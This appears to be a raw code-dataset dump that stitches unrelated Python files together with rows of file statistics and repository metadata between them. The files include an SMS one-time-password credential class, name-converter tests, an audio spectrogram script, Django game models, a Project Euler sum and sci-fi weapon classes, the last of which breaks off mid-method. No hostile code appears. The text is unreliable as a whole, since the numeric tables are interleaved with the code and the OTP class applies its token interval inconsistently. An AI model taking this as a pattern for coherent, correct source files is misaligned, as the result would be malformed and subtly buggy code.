return totp.verify(code, valid_window=1)
class InternalPhoneSMS(object):
def __init__(self, credential_directory, **kwargs):
self._credential_directory = credential_directory
def create_credentials(self, principal, credentials):
from uuid import uuid4
from ..models import OneTimePasswordCredential
from ..models import _tzmin
from ..models import _tzmax
from pyotp import random_base32
from talos.contrib.sms_sender import SMSSender
import pyotp
otp_credential = OneTimePasswordCredential()
otp_credential.uuid = uuid4()
otp_credential.directory = self._credential_directory
otp_credential.principal = principal
otp_credential.valid_from = _tzmin()
otp_credential.valid_till = _tzmax()
base32_secret = random_base32()
otp_credential.salt = base32_secret.encode()
otp_credential.save()
totp = pyotp.TOTP(otp_credential.salt, interval=200)
sms_sender = SMSSender()
sms_sender.send_message(principal.phone, 'Your code is {}'.format(totp.now()))
def verify_credentials(self, principal, credentials):
code = credentials['code']
from ..models import _tznow
from ..models import OneTimePasswordCredential
from pyotp import TOTP
try:
otp_credential = self._credential_directory.credentials.get(
principal=principal,
valid_from__lte=_tznow(),
valid_till__gte=_tznow())
secret_key = otp_credential.salt.decode()
totp = TOTP(secret_key, interval=200)
if totp.verify(code, valid_window=1):
return True
except OneTimePasswordCredential.DoesNotExist:
pass
return False
def reset_credentials(self, super_principal, principal, credentials):
from ..models import _tznow
from ..models import OneTimePasswordCredential
try:
otp_credential = self._credential_directory.credentials.get(
principal=principal,
valid_from__lte=_tznow(),
valid_till__gte=_tznow())
otp_credential.delete()
return True
except OneTimePasswordCredential.DoesNotExist:
pass
return False
def generate_credentials(self, principal, credentials):
from ..models import _tznow
from pyotp import TOTP
from talos.models import OneTimePasswordCredential
from ..contrib.sms_sender import SMSSender
try:
otp_credential = self._credential_directory.credentials.get(
principal=principal,
valid_from__lte=_tznow(),
valid_till__gte=_tznow())
secret_key = otp_credential.salt.decode()
totp = TOTP(secret_key)
sms_sender = SMSSender()
sms_sender.send_message(principal.phone, 'Your registraion code is %s' % totp.now())
return True
except OneTimePasswordCredential.DoesNotExist:
pass
return False
def send_otp(self, principal, credential):
import pyotp
from ..contrib.sms_sender import SMSSender
salt = credential.salt
totp = pyotp.TOTP(salt, interval=200)
sms_sender = SMSSender()
sms_sender.send_message(principal.phone, totp.now())
def verify_otp(self, principal, credential, code):
import pyotp
# Type of salt is memoryview
salt = credential.salt
# TODO: Remove .tobytes()
if isinstance(salt, memoryview):
salt = salt.tobytes()
totp = pyotp.TOTP(salt, interval=200)
if totp.verify(code, valid_window=1):
return True
return False
| 32.539171
| 96
| 0.633621
| 691
| 7,061
| 6.212735
| 0.120116
| 0.096902
| 0.063359
| 0.066853
| 0.863965
| 0.837876
| 0.772187
| 0.729327
| 0.683205
| 0.614256
| 0
| 0.007643
| 0.29585
| 7,061
| 216
| 97
| 32.689815
| 0.855792
| 0.010905
| 0
| 0.871951
| 0
| 0
| 0.009456
| 0
| 0
| 0
| 0
| 0.00463
| 0
| 1
| 0.091463
| false
| 0.140244
| 0.195122
| 0.006098
| 0.402439
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
e1252796df4cebad9091f060cc3e259838547f71
| 1,571
|
py
|
Python
|
tests/test_name_converter.py
|
stajc06/hue_sms
|
6b174e6a8ee516c91f697b158c1b325281caad40
|
[
"MIT"
] | 1
|
2021-11-16T17:55:54.000Z
|
2021-11-16T17:55:54.000Z
|
tests/test_name_converter.py
|
stajc06/hue_sms
|
6b174e6a8ee516c91f697b158c1b325281caad40
|
[
"MIT"
] | 9
|
2021-06-03T18:26:05.000Z
|
2022-02-11T15:59:15.000Z
|
tests/test_name_converter.py
|
stajc06/hue_sms
|
6b174e6a8ee516c91f697b158c1b325281caad40
|
[
"MIT"
] | 12
|
2018-03-17T13:59:20.000Z
|
2021-07-02T15:48:49.000Z
|
from name_converter import NameConverter, clean_name
red = (237, 10, 63)
red_orange = (255,104,31)
robins_egg_blue = (0, 204, 204)
def test_clean_caps():
assert 'red' == clean_name('Red')
assert 'red' == clean_name('RED')
assert 'red' == clean_name('red')
assert 'red' == clean_name('ReD')
def test_clean_punctuation():
assert 'red' == clean_name('Red.')
assert 'red' == clean_name('RED!')
assert 'red' == clean_name('red?')
def test_clean_whitespace():
assert 'red' == clean_name(' Red ')
assert 'red' == clean_name('\t\tRed\t\t')
assert 'red' == clean_name('\n\nRed\n\n')
def test_exact_spelling():
converter = NameConverter()
assert red == converter.convert('Red')
assert red_orange == converter.convert('Red-Orange')
assert robins_egg_blue == converter.convert("Robin's Egg Blue")
def test_leading_and_trailing_space():
converter = NameConverter()
assert red == converter.convert(' Red ')
assert red_orange == converter.convert('\nRed-Orange\n')
assert robins_egg_blue == converter.convert("\t\tRobin's Egg Blue\t\t")
def test_different_cases():
converter = NameConverter()
assert red == converter.convert('RED')
assert red_orange == converter.convert('red-orange')
assert robins_egg_blue == converter.convert("RoBin'S Egg blue")
def test_punctuation():
converter = NameConverter()
assert red == converter.convert('Red.')
assert red_orange == converter.convert('Red-Orange!')
assert robins_egg_blue == converter.convert("Robin's Egg Blue?")
| 29.092593
| 75
| 0.674729
| 207
| 1,571
| 4.917874
| 0.198068
| 0.159136
| 0.137525
| 0.176817
| 0.740668
| 0.740668
| 0.706287
| 0.706287
| 0.706287
| 0.667976
| 0
| 0.01691
| 0.171865
| 1,571
| 53
| 76
| 29.641509
| 0.765565
| 0
| 0
| 0.216216
| 0
| 0
| 0.140127
| 0
| 0
| 0
| 0
| 0
| 0.594595
| 1
| 0.189189
| false
| 0
| 0.027027
| 0
| 0.216216
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0112b1e766c9dcfc592fc0a89eedb05ae26b8017
| 1,974
|
py
|
Python
|
chapter_15/make_augmented_spectrograms.py
|
haloway13/PracticalDeepLearningPython
|
c3760b17945c9389421c2970a3d16c6528fb7af6
|
[
"MIT"
] | 44
|
2021-02-25T00:52:04.000Z
|
2022-03-16T02:04:50.000Z
|
chapter_15/make_augmented_spectrograms.py
|
rkneusel9/PracticalDeepLearningWithPython
|
561004e76b3e0828a59952874443384c31b6d84e
|
[
"MIT"
] | null | null | null |
chapter_15/make_augmented_spectrograms.py
|
rkneusel9/PracticalDeepLearningWithPython
|
561004e76b3e0828a59952874443384c31b6d84e
|
[
"MIT"
] | 18
|
2021-03-18T11:22:18.000Z
|
2022-03-08T21:10:42.000Z
|
#
# file: make_augmented_spectrograms.py
#
# Use sox to make the spectrogram images.
#
# RTK, 11-Nov-2019
# Last update: 11-Nov-2019
#
################################################################
import os
import numpy as np
from PIL import Image
rows = 100
cols = 160
# train
flist = [i[:-1] for i in open("../data/audio/ESC-10/augmented_train_filelist.txt")]
N = len(flist)
img = np.zeros((N,rows,cols,3), dtype="uint8")
lbl = np.zeros(N, dtype="uint8")
p = []
for i,f in enumerate(flist):
src, c = f.split()
os.system("sox %s -n spectrogram" % src)
im = np.array(Image.open("spectrogram.png").convert("RGB"))
im = im[42:542,58:858,:]
im = Image.fromarray(im).resize((cols,rows))
img[i,:,:,:] = np.array(im)
lbl[i] = int(c)
p.append(os.path.abspath(src))
os.system("rm -rf spectrogram.png")
p = np.array(p)
idx = np.argsort(np.random.random(N))
img = img[idx]
lbl = lbl[idx]
p = p[idx]
np.save("../data/audio/ESC-10/esc10_spect_train_images.npy", img)
np.save("../data/audio/ESC-10/esc10_spect_train_labels.npy", lbl)
np.save("../data/audio/ESC-10/esc10_spect_train_paths.npy", p)
# test
flist = [i[:-1] for i in open("../data/audio/ESC-10/augmented_test_filelist.txt")]
N = len(flist)
img = np.zeros((N,rows,cols,3), dtype="uint8")
lbl = np.zeros(N, dtype="uint8")
p = []
for i,f in enumerate(flist):
src, c = f.split()
os.system("sox %s -n spectrogram" % src)
im = np.array(Image.open("spectrogram.png").convert("RGB"))
im = im[42:542,58:858,:]
im = Image.fromarray(im).resize((cols,rows))
img[i,:,:,:] = np.array(im)
lbl[i] = int(c)
p.append(os.path.abspath(src))
os.system("rm -rf spectrogram.png")
p = np.array(p)
idx = np.argsort(np.random.random(N))
img = img[idx]
lbl = lbl[idx]
p = p[idx]
np.save("../data/audio/ESC-10/esc10_spect_test_images.npy", img)
np.save("../data/audio/ESC-10/esc10_spect_test_labels.npy", lbl)
np.save("../data/audio/ESC-10/esc10_spect_test_paths.npy", p)
| 27.416667
| 83
| 0.627153
| 337
| 1,974
| 3.602374
| 0.252226
| 0.059308
| 0.079077
| 0.092257
| 0.847611
| 0.847611
| 0.847611
| 0.847611
| 0.847611
| 0.825371
| 0
| 0.043453
| 0.137285
| 1,974
| 71
| 84
| 27.802817
| 0.669407
| 0.067376
| 0
| 0.745098
| 0
| 0
| 0.29932
| 0.218821
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
01879ce17c96c92433461fece65cdf2c94744ac8
| 3,628
|
py
|
Python
|
backend/restful_api/models.py
|
dschmide/proofofkortzept
|
b3d7201a0178c6a3752d9f02461fa9bc11aa9163
|
[
"MIT"
] | null | null | null |
backend/restful_api/models.py
|
dschmide/proofofkortzept
|
b3d7201a0178c6a3752d9f02461fa9bc11aa9163
|
[
"MIT"
] | 37
|
2018-10-24T15:51:28.000Z
|
2019-01-17T15:10:02.000Z
|
backend/restful_api/models.py
|
dschmide/proof_of_kort-cept
|
b3d7201a0178c6a3752d9f02461fa9bc11aa9163
|
[
"MIT"
] | null | null | null |
from django.contrib.gis.db import models
from django.contrib.auth import get_user_model
# Array Field for Tower locations
from django.contrib.postgres.fields import ArrayField
User = get_user_model()
class PlacedLandmark(models.Model):
location = ArrayField(models.DecimalField(max_digits=18, decimal_places=15), size=2)
label = models.CharField(max_length=99)
owner = models.CharField(max_length=99)
creator = models.ForeignKey(User, on_delete=models.CASCADE)
class Meta:
ordering = ('creator',)
@staticmethod
def has_read_permission(request):
return True
def has_object_read_permission(self, request):
return True
@staticmethod
def has_create_permission(request):
return True
@staticmethod
def has_write_permission(request):
return request.user.is_authenticated
def has_object_write_permission(self, request):
return request.user == self.creator
class PlacedTower(models.Model):
location = ArrayField(models.DecimalField(max_digits=18, decimal_places=15), size=2)
creator = models.ForeignKey(User, on_delete=models.CASCADE)
class Meta:
ordering = ('creator',)
@staticmethod
def has_read_permission(request):
return request.user.is_authenticated
def has_object_read_permission(self, request):
return request.user.is_authenticated
@staticmethod
def has_create_permission(request):
return True
@staticmethod
def has_write_permission(request):
return request.user.is_authenticated
def has_object_write_permission(self, request):
return request.user == self.creator
class UserAttributes(models.Model):
koins = models.DecimalField(default=0, max_digits=10, decimal_places=0)
experience = models.DecimalField(default=0, max_digits=10, decimal_places=0)
towers = models.DecimalField(default=0, max_digits=10, decimal_places=0)
landmarks = models.DecimalField(default=0, max_digits=10, decimal_places=0)
creator = models.ForeignKey(User, on_delete=models.CASCADE)
tower_range = models.DecimalField(default=0, max_digits=10, decimal_places=0)
sight_range = models.DecimalField(default=0, max_digits=10, decimal_places=0)
class Meta:
ordering = ('creator',)
@staticmethod
def has_read_permission(request):
return request.user.is_authenticated
def has_object_read_permission(self, request):
return request.user.is_authenticated
@staticmethod
def has_create_permission(request):
return True
@staticmethod
def has_write_permission(request):
return request.user.is_authenticated
def has_object_write_permission(self, request):
return request.user == self.creator
class solvedMission(models.Model):
osmID = models.DecimalField(default=0, max_digits=10, decimal_places=0)
answer = models.CharField(max_length=99)
solved_by = models.CharField(default=0, max_length=99)
timestamp = models.DecimalField(default=0, max_digits=16, decimal_places=0)
creator = models.ForeignKey(User, on_delete=models.CASCADE)
class Meta:
ordering = ('osmID', 'creator')
@staticmethod
def has_read_permission(request):
return True
def has_object_read_permission(self, request):
return True
@staticmethod
def has_create_permission(request):
return True
@staticmethod
def has_write_permission(request):
return request.user.is_authenticated
def has_object_write_permission(self, request):
return request.user.is_authenticated
| 29.495935
| 88
| 0.727122
| 441
| 3,628
| 5.773243
| 0.170068
| 0.047133
| 0.084839
| 0.113119
| 0.858209
| 0.827573
| 0.813826
| 0.813826
| 0.807934
| 0.807934
| 0
| 0.017288
| 0.18688
| 3,628
| 122
| 89
| 29.737705
| 0.845763
| 0.008545
| 0
| 0.755814
| 0
| 0
| 0.009179
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.232558
| false
| 0
| 0.034884
| 0.232558
| 0.802326
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 9
|
6d9b694294fe2dea4671f7a7c521102f5bc2fe98
| 10,398
|
py
|
Python
|
p013.py
|
anadahalli/project-euler
|
d4150a5a6c54cf9f4edcd024df69b01bf03c2a10
|
[
"CC0-1.0"
] | 1
|
2017-02-03T15:37:42.000Z
|
2017-02-03T15:37:42.000Z
|
p013.py
|
anadahalli/project-euler
|
d4150a5a6c54cf9f4edcd024df69b01bf03c2a10
|
[
"CC0-1.0"
] | null | null | null |
p013.py
|
anadahalli/project-euler
|
d4150a5a6c54cf9f4edcd024df69b01bf03c2a10
|
[
"CC0-1.0"
] | null | null | null |
"""Problem 013
Work out the first ten digits of the sum of the following
one-hundred 50-digit numbers.
37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690
"""
num = """37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690"""
ans = sum(int(i) for i in num.split('\n'))
ans = str(ans)[:10]
print(ans)
| 48.816901
| 59
| 0.973937
| 236
| 10,398
| 42.911017
| 0.538136
| 0.000987
| 0.029624
| 0.039498
| 0.987459
| 0.987459
| 0.987459
| 0.987459
| 0.987459
| 0.987459
| 0
| 0.984747
| 0.022697
| 10,398
| 212
| 60
| 49.04717
| 0.011809
| 0.500096
| 0
| 0
| 0
| 0
| 0.982662
| 0.963206
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.009709
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
098e1794f898ef6f88e8e340034b27194c271d07
| 172
|
py
|
Python
|
dataloaders/__init__.py
|
GT-RIPL/DistillMatch-SSCL
|
e572671fd6994b3c43ad6e46e9efb3588804524c
|
[
"MIT"
] | 9
|
2021-07-13T07:08:19.000Z
|
2022-01-27T13:41:19.000Z
|
dataloaders/__init__.py
|
GT-RIPL/DistillMatch-SSCL
|
e572671fd6994b3c43ad6e46e9efb3588804524c
|
[
"MIT"
] | null | null | null |
dataloaders/__init__.py
|
GT-RIPL/DistillMatch-SSCL
|
e572671fd6994b3c43ad6e46e9efb3588804524c
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from .inc_ssl import iCIFAR100, iCIFAR10, SSLDataLoader, iTinyIMNET
__all__ = ('iCIFAR100','iCIFAR10','SSLDataLoader','iTinyIMNET')
| 34.4
| 67
| 0.80814
| 18
| 172
| 7.166667
| 0.611111
| 0.263566
| 0.465116
| 0.620155
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063694
| 0.087209
| 172
| 5
| 68
| 34.4
| 0.757962
| 0
| 0
| 0
| 0
| 0
| 0.231214
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
09c876a4240ab268ff1783bdc0c6205d8f4ccae5
| 7,215
|
py
|
Python
|
kobayashi/weapons/core_weapons.py
|
TheDataLeek/kobayashi
|
2bc17f7be94f7df97d7501d3a51308adfce1f0c2
|
[
"MIT"
] | 1
|
2019-03-26T19:27:09.000Z
|
2019-03-26T19:27:09.000Z
|
kobayashi/weapons/core_weapons.py
|
TheDataLeek/kobayashi
|
2bc17f7be94f7df97d7501d3a51308adfce1f0c2
|
[
"MIT"
] | null | null | null |
kobayashi/weapons/core_weapons.py
|
TheDataLeek/kobayashi
|
2bc17f7be94f7df97d7501d3a51308adfce1f0c2
|
[
"MIT"
] | null | null | null |
from .base_weapon import Weapon, check_ammo
from ..util import dice
class MultifocalLaser(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=20,
power=5
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(1, 4)
class ReaperBattery(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
clumsy=True,
power=4
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 4)
class FractalImpactCharges(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=15,
ammo=4,
power=5,
to_hit_mod=11
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(2, 6) + self.extra_dmg
class PolyspectralMESBeam(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=25,
weap_phase=1,
power=5
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(2, 4)
class Sandthrower(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
flak=True,
power=3
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(2, 4)
class FlakEmitterBattery(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=10,
flak=True,
power=5,
free_mass=3,
min_class=1
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(2, 6)
class TorpedoLauncher(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=20,
ammo=4,
power=10,
free_mass=3,
min_class=1
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 8)
class ChargedParticleCaster(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=15,
clumsy=True,
power=10,
hardpoints=2,
min_class=1
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 6)
class PlasmaBeam(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=10,
power=5,
free_mass=2,
hardpoints=2,
to_hit_mod=8,
min_class=1
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 6) + self.extra_dmg
class MagSpikeArray(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
flak=True,
weap_phase=1,
ammo=10,
power=5,
free_mass=2,
hardpoints=2,
min_class=1
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(2, 6) + self.extra_dmg
class SpinalBeamCannon(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=15,
weap_phase=1,
clumsy=True,
power=10,
free_mass=5,
hardpoints=3,
min_class=2
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 10)
class SmartCloud(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
cloud=True,
clumsy=True,
power=10,
free_mass=5,
hardpoints=2,
min_class=2,
to_hit_mod=8
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 10) + self.extra_dmg
class Gravcannon(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=20,
power=15,
free_mass=4,
hardpoints=3,
min_class=2,
to_hit_mod=8
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(4, 6) + self.extra_dmg
class SpikeInversionProjector(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=15,
weap_phase=2,
power=10,
free_mass=3,
hardpoints=3,
min_class=2,
to_hit_mod=1
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 8) + self.extra_dmg
class VortexTunnelInductor(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=20,
weap_phase=1,
clumsy=True,
power=20,
free_mass=10,
hardpoints=4,
min_class=3
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 20)
class MassCannon(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=20,
weap_phase=3,
ammo=4,
power=10,
free_mass=5,
hardpoints=4,
min_class=3
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(2, 20)
class LightningChargeMantle(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=5,
cloud=True,
power=15,
free_mass=5,
hardpoints=2,
min_class=3,
to_hit_mod=5
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(1, 20) + self.extra_dmg
class SingularityGun(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=20,
weap_phase=6,
power=25,
free_mass=10,
hardpoints=5,
min_class=3,
to_hit_mod=5
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
